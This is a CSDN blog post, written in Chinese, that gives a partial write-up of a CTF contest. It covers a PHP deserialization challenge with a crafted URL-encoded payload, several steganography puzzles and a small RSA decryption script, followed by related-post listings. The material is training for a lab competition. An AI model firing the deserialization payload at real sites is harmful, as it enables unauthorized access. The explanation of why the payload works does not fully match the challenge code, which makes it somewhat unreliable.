第一届广西英招杯部分WP

已于 2023-01-12 02:18:26 修改
阅读量809 收藏
点赞数 1
文章标签: python 安全 web安全
于 2022-11-19 00:31:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62584974/article/details/127930983
版权

参与了广西英招杯,里面的题还蛮有意思,写个博客记录一下解题方法

WEB

Serialize

题目:

 

<?php
error_reporting(0);
include_once("flag.php");
class gxyzb
{
    private $keys;
    public $reals;
    function __wakeup(){
        global $empty;
        global $flag;
        $a->keys = $empty;
        if ($a->keys === $a->reals){
            echo($flag);
        }else{
            echo "retreat!retreat!retreat!";
        }
    }
}
if(isset($_GET['yzb'])){
    $data = $_GET['yzb'];
    unserialize($data);
} else {
    show_source(__FILE__);
    echo 'Welcome to the world of GXZYBCTF2022!';
}
?> Welcome to the world of GXZYBCTF2022!

只有构造这个($a->keys === $a->reals)相等才会输出flag,生成序列化数据

<?php 
  class gxyzb{
  public $keys;
  public $reals;
  public $empty;
  function __construct(){
    $this->reals = '1';
    $this->empty = '1';
  }
}

$a =new gxyzb();
echo urlencode(serialize($a));

把这个值以GET方式传给yzb 

payload:

?yzb=O%3A5%3A%22gxyzb%22%3A3%3A%7Bs%3A4%3A%22keys%22%3BN%3Bs%3A5%3A%22reals%22%3Bs%3A1%3A%221%22%3Bs%3A5%3A%22empty%22%3Bs%3A1%3A%221%22%3B%7D

得到flag

flag(hierarch666_ nc@vt2022 kk!}
 

MICS

寻找宝藏

解压后得到:

打开cipher.txt

得到佛曰,打开普通的佛曰解密是解密不出的,可能需要密钥 

打开航海的梦想.doc

发现什么都没有

word设置显示隐藏 

得到了一张图片

 移开图片发现密钥:ncvt

用佛又曰解密

与佛论禅:佛曰加密解密翻译器及使用教程 | 爱淘数字资源馆 (1itao.com)

 得到Unicode编码

看见0x,使用16进制转字符串

 再用16进制转字符串

得到flag{secrets of pirates} 

谜中谜

解压后得到一个one文件

把one拉入010editor里面发现是一个zip文件

把504B前的全删掉,得到一个压缩包

解压,密码在压缩包注释里面

得到一个密文,是零宽密文 

用网站解密

Offdev.net - Zero-width space steganography javascript demo

得到

C.Trmlnekuay Ibmjacmrs ray Fkmrickars Byumricka ray Iercacan (IFBI) jrd tbba dbefcan rd r ocssre gke ijb okdi-oraybhcm bmkakhcm ebmkfbez, hbbican ijb ybhray gke zkuan oekgbddckarsd dlcssby ray gussz oeboreby gke ijb srtke hrelbi. Caibearickars mkkobericka ray bqmjranbd kg fkmrickars byumricka ray dlcssd ybfbskohbai jrfb ijba tbmkhb r hudi ri oebdbai ik mkhoebjbadcfbsz choekfb ijb wursciz kg IFBI. Dumj mkamboi jrd tbba riirmjby humj chokeiramb ray pbss ybhkadieriby ca TECMD sbrybed "Qcrhba Ybmsrericka", "Xkjraabdtuen Ybmsrericka", "Terdcscr Ybmsrericka", "Hkdmkp Ybmsrericka" ray "Abp Ybsjc Ybmsrericka". Ca keybe ik mkaicaub chosbhbaican ijb mkamboi, (r osrigkeh kg diebanijbacan oreiabedjcod) ray bqmjranbd ka IFBI gke fkmrickars cadiciuickad ray baibeoecdbd ca (TECMD cd abmbddrez). Rnrcadi ijcd trmlyeko, ijb Hcacdiez kg Byumricka kg ijb Obkosb’d Eboutscm kg Mjcar pcss cacicrib ray kenracvb 2022 TECMD Dlcssd Mkhobicicka (jbebcargibe ebgbeeby ik rd ijb Mkhobicicka). Rd r osrigkeh gke IFBI bqmjranbd ca TECMD, ijb Mkhobicicka cd ybycmriby ik grmcscirican ijb rmwucdcicka kg dlcssd ray mkhobibamcbd tz zkuan oekgbddckarsd, rd pbss rd baecmjcan ijb mkkobericka tbipbba fkmrickars cadiciuickad ray baibeoecdbd, rchcan ik oekhkib ijb wursciz ybfbskohbai kg fkmrickars byumricka ca TECMD gsrn cd (ZVTMIG_TZIB_KUI_ZZYD). CC.Caiekyumicka Ijb Mkhobicicka pcss lcml kgg ca srib Hremj, ray mskdb ca Akfbhtbe. Lcml-kgg Mkhobicicka, Iercacan Mrhod ray Gcars Mkhobicicka pcss tb mkhoecdby ca fceiurs ray kggscab gkehrid. Rekuay 20 mkhobican dlcssd pcss tb dbi ca ijb Mkhobicicka (osbrdb ebgbe ik Raabq gke dobmcgcm mkhobican dlcssd scdi), mbaibecan ka gcbsyd camsuycan caibsscnbai hraugrmiuecan ibmjacmrs dlcssd, reicgcmcrs caibsscnbamb ibmjacmrs dlcssd, ycncirs ibmjacmrs dlcssd, bim. IFBI cadiciuickad diuybaid ray ibrmjbed gekh TECMD reb rss pbsmkhb ray bqobmiby ik sbfbs uo ijbce mrortcscicbd ebnreycan caakfricka, mkkeycaricka, kenracvricka, ray mkssrtkericka fcr oreicmcorican ca ijb Mkhobicicka. TECMD Tudcabdd Mkuamcs pcss xkcaisz jkdi ijb Mkhobicicka tz caibnerican cid TECMD Guiueb (Dlcssd Mjrssbanb caik ijb mkaibdi).

用quipquip得到

 flag is (YZBCTF_BYTE_OUT_YYDS) 

剧情大反转

解压后得到

一个图片,拖进010eitor

发现文件非常大,前面是一个png文件,我们搜索png文件的文件尾00 00 00 00 49 45 4E 44 AE 42 60 82 发现后面果然藏着一个文件

拉到文件尾,

 发现是zip文件头504B的倒写,把前面的图片的数据去掉

 然后写一个倒写的py脚本破解

f = open('esrever.zip', 'rb').read()
res = open('esrever2.zip', 'wb')
res.write(f[::-1])

 得到的文件是文本形式,还要在winhex里面复制粘贴选择ascii转换成16进制形式

 用bandzip可以直接解压,得到一个镜像图片

 使用在线镜像转换工具转换

在线旋转图片工具|在线翻转照片|调整照片方向|生成镜像图片 - 改图宝

 

 得到flag:

flag{9f0fd18f89e6b73f05c139b0a9e4c98}

Crypto

简单rsa

 解压后得到

先把n分解为两个素数相乘

 分解为p=247584441478617843244733947,q=17223123123987172123123136363611

用python脚本直接解出rsa算法

import gmpy2
import binascii

e = 89711
n = 4264177319169831744815469673790679137257655640358747202617
c = 2395996868904835874906960174284885776479399639913587352175
p = 247584441478617843244733947
q = 17223123123987172123123136363611

phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
m = gmpy2.powmod(c,d,n)

print(binascii.unhexlify(hex(m)[2:]))

 

解得: 

b'Welcome_t@_2022ZybCtf!'

flag{Welcome_t@_2022ZybCtf!}

墨言ink
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
8月7日CTF反序列化训练
slc3315的博客
08-08 1610
题目一 题目: 思路: 根据题目提示,存在备份文件,使用御剑或者disteach进行查找,找到www.zip,下载源码进行源码分析,然后构造对应反序列化参数即可 步骤一 源码分析: class Name{ public $username; public $password; function __wakeup(){ $this->username = 'guest'; } function __destruct(){ if
这些年,我身边的那些人和事
热门推荐
Java's paradise
03-23 1万+
引言      2013年的8月13日,群主打开自己的QQ,建立了第一个技术交流群,也就是现在的交流一群。   时光飞逝,转眼之间,3年半已经过去了。   当初建群的时候,群主才工作不到两年,期间借着业余时间,写了一个设计模式的系列,因此吸引了一批同道中人一起学习。为了给大家一个一起交流的地方,群主便顺手建了一个QQ群。   谁曾想,3年半过去了,这个无意之中建立的QQ群,不止见证了群主的成长,也
英招杯pwn1(字符串格式化漏洞)
qq_53928256的博客
11-16 310
第二个参数writes表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数改为system函数地址,就写成{printfGOT:systemAddress};可能需要修改8个字节的数据,太麻烦了!即可将puts函数的真实地址泄露出来,即可获得对应的libc版本和基址,方便我们后面的操作;生成随机数代码,通过ctypes包下的cdll来加载libc,这样才能执行libc下的函数。根据地址泄露我们已经能确定对应的libc版本,加载对应的libc,即可获得libc的基址。
BUUCTF笔记之Web系列部分WriteUp(二)
克格莫
05-17 2169
1、[极客大挑战 2019]Http 不敢置信12世纪了还有这种简单题,我还在拼命扫目录和备份。。。。 在secret.php重发http请求头 Referer: https://www.Sycsecret.com 修改User-Agent为Syclover: 这里伪造来源IP 添加一个字段X-Forwarded-For: 127.0.0.1 拿到flag. ...
英招杯 pwn2(ret2shellcode)
qq_53928256的博客
11-16 289
由于程序运行时,即输出了输入值s的存放首地址,我们输入的首地址与shellcode之间的距离是0x3c-0x28=0x14,故只需返回s的首地址加上0x14即可;我们分析main函数的时候可以看到栈中的s距离rbp还有一段距离,且程序的NX保护未开启,我们可以考虑写入shellcode在栈中执行。根据图中与rbp的偏移,我们相对比较容易的出var_30对应的变量为v5,var_8对应的变量为v10。在网上我们可以查到相对较短的syscall系统调用的shellcode为23字节,满足我们所需的要求。
end的学习反序列化3
qq_45781155的博客
04-08 371
1,wakeup <?php class SoFun{ //类 protected $file='index.php';//protected:是受保护的,只有在类内部以及继承类中使用,类外部不能使用。换 function __destruct(){//函数 if(!empty($this->file)) {//empty() 函数用于检查一个变量是否为空。 if(strchr($this-> file,"\\")===false && st
2021年山东省职业院校技能大赛中职组”网络安全“正式赛题
旺仔Sec&blog
07-20 3417
模块 A 基础设施设置与安全加固一、服务器环境说明 Windows server 2008 系统:用户名 administrator,密码123456Linux 系统:用户名 root,密码 123456二、说明: 1.所有截图要求截图界面、字体清晰,并粘贴于相应题目要求的位置;2.文件名命名及保存:网络安全模块 A-XX(XX 为工位号),PDF格式保存;3.文件保存到 U 盘提交。三、具体任务(每个任务得分电子答题卡为准)
第二届数据安全大赛暨首届“数信杯”数据安全大赛数据安全积分争夺赛-东区预赛部分WP
Aluxian_的博客
04-16 1728
(最终提交的结果为md5(不安全协议缩写小写+用户名+密码)。如不安全协议为http,用户名为abc,密码为123,则md5(http+abc+123,)提交48346e4b413ad63aac2d7e528f1da1e6)2.通过协议分析,基于不安全协议,可发现流量包中共计传输多少份文件,其中相对特殊的文件,其文件名是什么?如数量为 1,文件名(不包含后缀)为 flag,则提交结果为 md5(1+flag),提交:13fdbdc6aa7c5412c598e30f5bdbfdc3。
12月行业政策丨紧握十四五规划,实现科技创新
weixin_55366265的博客
01-24 1769
国家政策1、工业和信息化部发布《“十四五”信息化和工业化深度融合发展规划》11月30日,工业和信息化部发布《“十四五”信息化和工业化深度融合发展规划》(简称《规划》)。《规划》指出,信息化......
2020 第二届网鼎杯 boom wp
01-20
2020 第二届网鼎杯 boom wp ​ ​ 卑微新手在线答题。。。。。 第二届网鼎杯-boom 下载附件得到一个boom.exe程序 打开是这样 根据提示继续 得到一串md5 加密的数据,使用在线解密 https://www.somd5.com/ 得到第...
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络...
第一届长城杯 第三赛区 半决赛 AWD 源码
04-23
【描述】"第一届长城杯 第三赛区 半决赛 AWD 源码"的描述进一步证实了这是关于竞赛源代码的分享,没有提供更多的技术细节,但我们可以推测这部分源码可能包含了一些创新的算法或实现,因为它是竞赛的关键部分。...
i-SOON_CTF_2018:2018第一届安洵杯过渡环境源码WP
03-24
AXB-CTF 2018第一届安洵杯过渡环境/原始码
第二届赣网杯WEB第一题WP.docx
12-06
2021第二届赣网杯WEB第一题WP
cv2读取和保存图片
最新发布
m0_53291740的博客
07-12 110
cv2.imwrite('b\\img1.png',img)#b存在就可以保存进去。如果b存在,c不存在,程序不会报错,也不会保存图片。如果目录b不存在就会存到当前文件夹。
面试题 21:解释 Python 中的 help() 函数和 dir() 函数?
专注于全栈开发领域
07-10 747
Python中,help()和dir()是两个非常有用的内置函数,它们可以帮助开发者更好地了解Python对象和模块。
聊聊如何在内网下构建大模型微调环境
python1234567_的博客
07-12 671
LlamaFactory新版更新后,还是比较方便,只是说llamafactory-cli命令的确是有点蒙,踩个坑就好了。对于LlamaFactory微调来说,本身不难,毕竟都是配置;主要是在内网环境下的依赖包拉取安装是真麻烦,但其实也还好。走一遍的话,还是可以学到很多的。​。
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
小明的Java问道之路
07-08 2358
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
羊城杯2020 wp
08-18
羊城杯2020是一场年度的电子竞技赛事,为广大电竞爱好者提供了一个展示技术和激发激情的舞台。今年的羊城杯聚集了来自全国各地的顶尖电竞选手,他们在各个游戏项目中展现了高水平的操作和战术。 在比赛的文化氛围...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值